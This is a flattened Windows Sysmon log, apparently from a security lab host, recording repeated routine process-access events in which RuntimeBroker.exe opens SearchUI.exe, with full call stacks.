13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x800000000000000012298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
